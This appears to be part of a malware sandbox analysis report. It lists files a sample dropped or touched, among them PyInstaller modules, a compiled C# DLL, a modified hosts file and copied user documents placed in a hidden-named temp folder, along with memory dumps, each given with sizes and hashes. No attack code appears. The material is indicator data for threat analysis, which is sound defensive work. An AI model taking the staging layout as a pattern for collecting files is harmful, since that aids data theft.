C:\Users\Admin\AppData\Local\Temp\_MEI23002\select.pyd

Filesize
25KB

MD5
d76b7f6fd31844ed2e10278325725682

SHA1
6284b72273be14d544bb570ddf180c764cde2c06

SHA256
e46d0c71903db7d735cc040975bfc480dfea34b31b3e57b7dafa4c1f4058e969

SHA512
943ca5600f37cf094e08438e1f93b869f108abd556785e5d090051ed8cf003e85c1b380fc95f95bc871db59ffdd61099efa2e32d4354ca0cc70a789cf84abaa1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23002\sqlite3.dll

Filesize
630KB

MD5
73b763cedf2b9bdcb0691fb846894197

SHA1
bf2a9e88fba611c2e779ead1c7cfd10d7f4486b2

SHA256
e813695191510bf3f18073491dc0ea1b760bc22c334eefe0e97312810de5d8d5

SHA512
617cb2b6027a3aba009bb9946347c4e282dd50d38ca4764e819631feb3a7fd739fd458e67866f9f54b33b07645ca55229030860a4faab5f677866cfa4a1f7ee2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23002\unicodedata.pyd

Filesize
295KB

MD5
6873de332fbf126ddb53b4a2e33e35a5

SHA1
93748c90cd93fda83fcd5bb8187eeaf6b67a2d08

SHA256
f5631d92e9da39a6a1e50899d716eac323829d423a7f7fa21bd5061232564370

SHA512
0e03ba8c050aeadf88c390e5ea5e8e278f873885c970b67d5bc0675d782233a2925e753dae151c7af9976f64c42eba04a4dcec86204e983f6f6f2788a928401c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ih1f0s2o.vd5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tr2o0yz4\tr2o0yz4.dll

Filesize
4KB

MD5
7ffd73322facbf2a2b7d907414f393d9

SHA1
2f6321d59eddeb4cd33f2ac8c044b5a081effda1

SHA256
620d137d1292b09d914167e3626f298aee8a847b7c2a0c197e8338ba32b24c82

SHA512
7a584c96fb268ad365004c3e3741a1f88f3750d0bc7ad2de132a4d389c55bef3de7613b24e3118aee3585120923845b09b2ddc5fac4c2634ddce130981fd6dac

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‎‌ ‌\Common Files\Desktop\CopyGrant.docx

Filesize
19KB

MD5
0aea6b96426f41b4af001c29fe30c0f4

SHA1
1a123de46566be953eafbe4fbce1e255afdd830a

SHA256
33484e1056429dc89248c81dc877ce8421cd6c2d9436769d3d73eb5462bab19e

SHA512
b190d1eb6f3c23e50ebf62eb9e78abbb1297a1218839a743501a6f89e3fcb334e26d1e114de2797d46538df27fba5b2279d21d27243bae010d981896fafae142

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‎‌ ‌\Common Files\Desktop\PingUnpublish.docx

Filesize
15KB

MD5
1f6f6b3747e46ae51e4aee49b4814a5d

SHA1
98ac8ce74bc5f270ab48e7028913675c3f562041

SHA256
dcce2381705c591865745c51f7fcf6845001f264cf8f245b20bfff3bb6649f44

SHA512
d4e3a5bd683d4429121c87bc672c738a131fc06303d32c44f24aa8d6cc3fee125219e7463a762540ecc378949aa4ad0d214d979863a5210a639ec19a05c6a99c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‎‌ ‌\Common Files\Desktop\PopRevoke.docx

Filesize
18KB

MD5
60ff3d5edca1415810e3737f54d73ed2

SHA1
1f863e65f651fa41a8d3ed760c237290fa6590ba

SHA256
664387043ecd38aeff3fc17efba9c27442b25ebc6e458c49845257547eff13a7

SHA512
b0ccbd9c9258993f8fa29cb92a81c8b9b42fe9fedb65d61344840e112c58d1a553707ae13ffc12f9ae76786607593d0c288fd4659917bde644dd0b51ea24f02a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‎‌ ‌\Common Files\Desktop\RemoveAssert.xlsx

Filesize
13KB

MD5
5d3ce2e4cd9ebd74f61cca9a0a6f74ff

SHA1
a2088a0448a85e7aa7d1a99eb1dc8f27bb4a9c6a

SHA256
6f1ec8acfe74d5a4f186d9516193b630aa899fcac288254f2263777a0b9af119

SHA512
936a975b578c8645f9b0a926887632b289173022f160b7f2275cf71844b32fc3d46b0b64915f6b20d92b79b01f7ce41637dd85aae6e0014f28e2bda558607953

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‎‌ ‌\Common Files\Desktop\RevokeApprove.xlsx

Filesize
11KB

MD5
0901769a138abe72d92066a2d1488a52

SHA1
50cb2aafeaf0b701b1211127be6d3efaeb8acb3e

SHA256
c09d7789ca839193afad5e088b3b0400a3e7277db0f334a4439818f48e43d90e

SHA512
b77fd4fad72b49567719bdb738da85aa2fa8274a284bdd230f23dcf073775f764fe5b99dfc5d03575f9ca63b886fac9483d59faaa15cf4b4f6cdda1133e57eaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‎‌ ‌\Common Files\Documents\DismountStart.csv

Filesize
186KB

MD5
e8ee12c2691a898685ea6a24c44e18de

SHA1
48111165580cdb5619628e9bf1d9b77d62ec4b7f

SHA256
c5cc01f53e69b850b796b9a4b0d2a4edec20a2f92f99b04a2671fb122ad95370

SHA512
a7ab111392f447f0299c74ba9fcc62f138d1dd956d4a21092d7ad9923318dcc1bcaf5d8099a283b7fa7e3bad76d41386271689c60513753e836c82b22cb61f93

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‎‌ ‌\Common Files\Documents\LimitRename.xlsx

Filesize
513KB

MD5
407d4f1e0f6b7b6a1cfc4eee9a510eeb

SHA1
9b444467b16caadd05e98552e9045cda700034b6

SHA256
16b6e687986e7ddcc6d6a1c72790fae4ce5e70c3de7deacc8fba72e05cbd132c

SHA512
ba7cb1257e2987d47317a1c6b5dbd4c33c7124d60f3cbf4676a34696cef2c5c8aa6bfcf100c5277daf8a21a4904834df559ad652631dc3330b1e2fbeaa86c5f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‎‌ ‌\Common Files\Documents\MeasureGet.docx

Filesize
231KB

MD5
0dc8904d905f4110ca0b402e831adc02

SHA1
8017421070c634e4935379770ea1dc58cf67f862

SHA256
d71bea1a2392a30533ecebf1d00a24cc6a621a46361e68e7ea7a93c5ffb993b9

SHA512
9762a7856d4025a3b34df8bb7fc500a41b3b85fa25cf7a049bd601706f55a44843c0c162cb93bfb35ccd418fdb576a0aa7b1d78741ec3559bc4409e8053e8124

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‎‌ ‌\Common Files\Documents\PopRepair.xlsx

Filesize
11KB

MD5
cc8b2be33fa625dc8bdefcec13403b74

SHA1
bbdda5a00c9422dc98ada67d9bfc7cf619362268

SHA256
b1a59506efcd49dfcf663d91c0adcaa7f7ed28839576ab5f2c4499fb0ce62274

SHA512
1e3465f510aaf8252809f88dd810015c30e583a43b6cf582a273109caff7cf12b5f3f19afaf376008458ce71e7a18fef11731469fe2401f7a35bb2d9291d7258

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‎‌ ‌\Common Files\Documents\UnlockOpen.docx

Filesize
265KB

MD5
b98925831d489172de0716452231a430

SHA1
b8eb1d4838e9ef74d935dd4812e80b3d9779d842

SHA256
b4a65cb0bac5a693aea12ec38b40fbf7e4934a88ecd301d6a4cfe0bf5bbf37b1

SHA512
5cbd533217ba4602dbde118e4d3cd112030fa003f4c89f11174744171c8cf456453260432830a726a9b091d51bacad150ae9fa933311bd3edc713e8d6e37fe7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‎‌ ‌\Common Files\Documents\UnregisterUpdate.csv

Filesize
366KB

MD5
b19ff510ec32e5ff05a76d96b221182e

SHA1
fcbef9552b8c7131c2477546124fc24f44749653

SHA256
98be5ee52e48c34ce1e24d5920ee8a6c8921deffb83ac20d62794ed90e88fc44

SHA512
3d4dbf00e7608271097a8f5de74602456c2f829e86b03e0c08b8c5174a8759d737599f702e77e084b2dd21356db9b93242dd92b9cb1fe595b03f73e0862c5370

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‎‌ ‌\Common Files\Downloads\ConfirmRemove.png

Filesize
670KB

MD5
1e5f9f40ca8b9b838afe1aa804b71835

SHA1
dc8fb07782bfa1d33d9b59771893aa9c9c2fa4fc

SHA256
d13127140a74e93d989e0c7d46965ce2053c2b3493e2e179715ec6f350330543

SHA512
0b09e0489a6434c3b240697c6274be599ecbd26200267342bd0ee884cde74417e3c5adc7eb05a6ea43a246d114a9231dcc90cb04e3627d22696b647bc22e7bce

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tr2o0yz4\CSCF513E763D3694427A754F312D2EF6BD5.TMP

Filesize
652B

MD5
4609e22529cb3fba52e38d1586bbd1ba

SHA1
bd255ade9e19fb201f35fd28216e121f97ecbd6d

SHA256
4c936ca9d53e5a842ac17b8af2563fa3fdab16e746abfa70a6fc29799b7afd66

SHA512
ef87a8d7cde3a5ba076eadca8ca5417e78c805d88de0825cc828dd5b6c563b0f35acf82652f187402170e6014909202b461f7a27c2d06d024f60c8d7f267b916

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tr2o0yz4\tr2o0yz4.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tr2o0yz4\tr2o0yz4.cmdline

Filesize
607B

MD5
2ec6c82a45403ec45b65c53f296764b7

SHA1
f94f424c4c560a6b9de1281cd1e99c219edf752c

SHA256
ca10907ad667ca48d6176b968506aa2c03d6ba3298e721bb625378ec382ad674

SHA512
dc31632733d3b210e73bad6d76c8e80c224da0a5458548107879d3c26602a208374d00db56228cab71e3db2466e254fe2401d197d582a37d9f8a9f5258425d93

Download Submit
memory/1184-92-0x000001E898E20000-0x000001E898E42000-memory.dmp

Filesize
136KB

Download
memory/1428-48-0x00007FFBE5BA0000-0x00007FFBE5BAF000-memory.dmp

Filesize
60KB

Download
memory/1428-54-0x00007FFBDBCE0000-0x00007FFBDBD0D000-memory.dmp

Filesize
180KB

Download
memory/1428-103-0x00007FFBDB760000-0x00007FFBDB8D6000-memory.dmp

Filesize
1.5MB

Download
memory/1428-81-0x00007FFBDBCB0000-0x00007FFBDBCD3000-memory.dmp

Filesize
140KB

Download
memory/1428-82-0x00007FFBDB3C0000-0x00007FFBDB4DC000-memory.dmp

Filesize
1.1MB

Download
memory/1428-79-0x00007FFBE0610000-0x00007FFBE061D000-memory.dmp

Filesize
52KB

Download
memory/1428-76-0x00007FFBDBCE0000-0x00007FFBDBD0D000-memory.dmp

Filesize
180KB

Download
memory/1428-354-0x00007FFBDBC10000-0x00007FFBDBC34000-memory.dmp

Filesize
144KB

Download
memory/1428-77-0x00007FFBDC050000-0x00007FFBDC064000-memory.dmp

Filesize
80KB

Download
memory/1428-72-0x00007FFBDBC10000-0x00007FFBDBC34000-memory.dmp

Filesize
144KB

Download
memory/1428-272-0x00007FFBDBC70000-0x00007FFBDBCA3000-memory.dmp

Filesize
204KB

Download
memory/1428-24-0x00007FFBCD050000-0x00007FFBCD640000-memory.dmp

Filesize
5.9MB

Download
memory/1428-285-0x00007FFBDB690000-0x00007FFBDB75D000-memory.dmp

Filesize
820KB

Download
memory/1428-73-0x00007FFBCCB20000-0x00007FFBCD049000-memory.dmp

Filesize
5.2MB

Download
memory/1428-74-0x000001766E070000-0x000001766E599000-memory.dmp

Filesize
5.2MB

Download
memory/1428-69-0x00007FFBDB690000-0x00007FFBDB75D000-memory.dmp

Filesize
820KB

Download
memory/1428-68-0x00007FFBCD050000-0x00007FFBCD640000-memory.dmp

Filesize
5.9MB

Download
memory/1428-66-0x00007FFBDBC70000-0x00007FFBDBCA3000-memory.dmp

Filesize
204KB

Download
memory/1428-64-0x00007FFBE4CF0000-0x00007FFBE4CFD000-memory.dmp

Filesize
52KB

Download
memory/1428-62-0x00007FFBE07A0000-0x00007FFBE07B9000-memory.dmp

Filesize
100KB

Download
memory/1428-60-0x00007FFBDB760000-0x00007FFBDB8D6000-memory.dmp

Filesize
1.5MB

Download
memory/1428-58-0x00007FFBDBCB0000-0x00007FFBDBCD3000-memory.dmp

Filesize
140KB

Download
memory/1428-56-0x00007FFBE2420000-0x00007FFBE2439000-memory.dmp

Filesize
100KB

Download
memory/1428-123-0x00007FFBE07A0000-0x00007FFBE07B9000-memory.dmp

Filesize
100KB

Download
memory/1428-300-0x00007FFBCCB20000-0x00007FFBCD049000-memory.dmp

Filesize
5.2MB

Download
memory/1428-301-0x000001766E070000-0x000001766E599000-memory.dmp

Filesize
5.2MB

Download
memory/1428-30-0x00007FFBDBC10000-0x00007FFBDBC34000-memory.dmp

Filesize
144KB

Download
memory/1428-310-0x00007FFBDB760000-0x00007FFBDB8D6000-memory.dmp

Filesize
1.5MB

Download
memory/1428-304-0x00007FFBCD050000-0x00007FFBCD640000-memory.dmp

Filesize
5.9MB

Download
memory/1428-305-0x00007FFBDBC10000-0x00007FFBDBC34000-memory.dmp

Filesize
144KB

Download
memory/1428-339-0x00007FFBCD050000-0x00007FFBCD640000-memory.dmp

Filesize
5.9MB

Download
memory/1428-367-0x00007FFBDB3C0000-0x00007FFBDB4DC000-memory.dmp

Filesize
1.1MB

Download
memory/1428-366-0x00007FFBE0610000-0x00007FFBE061D000-memory.dmp

Filesize
52KB

Download
memory/1428-365-0x00007FFBDC050000-0x00007FFBDC064000-memory.dmp

Filesize
80KB

Download
memory/1428-364-0x00007FFBCCB20000-0x00007FFBCD049000-memory.dmp

Filesize
5.2MB

Download
memory/1428-363-0x00007FFBDB690000-0x00007FFBDB75D000-memory.dmp

Filesize
820KB

Download
memory/1428-362-0x00007FFBDBC70000-0x00007FFBDBCA3000-memory.dmp

Filesize
204KB

Download
memory/1428-361-0x00007FFBE4CF0000-0x00007FFBE4CFD000-memory.dmp

Filesize
52KB

Download
memory/1428-360-0x00007FFBE07A0000-0x00007FFBE07B9000-memory.dmp

Filesize
100KB

Download
memory/1428-359-0x00007FFBDB760000-0x00007FFBDB8D6000-memory.dmp

Filesize
1.5MB

Download
memory/1428-358-0x00007FFBDBCB0000-0x00007FFBDBCD3000-memory.dmp

Filesize
140KB

Download
memory/1428-357-0x00007FFBE2420000-0x00007FFBE2439000-memory.dmp

Filesize
100KB

Download
memory/1428-356-0x00007FFBDBCE0000-0x00007FFBDBD0D000-memory.dmp

Filesize
180KB

Download
memory/1428-355-0x00007FFBE5BA0000-0x00007FFBE5BAF000-memory.dmp

Filesize
60KB

Download
memory/1680-218-0x000001BCF47C0000-0x000001BCF47C8000-memory.dmp

Filesize
32KB

Download